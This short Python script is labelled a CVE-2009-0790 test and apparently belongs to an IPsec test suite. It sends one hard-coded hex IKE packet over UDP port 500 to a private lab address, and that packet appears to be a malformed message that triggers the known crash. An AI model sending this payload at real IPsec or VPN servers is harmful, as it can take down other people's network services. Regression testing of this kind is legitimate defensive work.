#!/usr/bin/python3

import socket
from binascii import unhexlify

HOST = '192.1.2.23'
PORT = 500

# CVE-2009-0790 test
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
data = unhexlify('e9d518f4f1fd71b066b0e45bae8542e3100b00050000000000003c0000002000000000001001288de9d518f4f1fd71b066b0e45bae8542e30000a662')
s.sendto(data, (HOST, PORT))

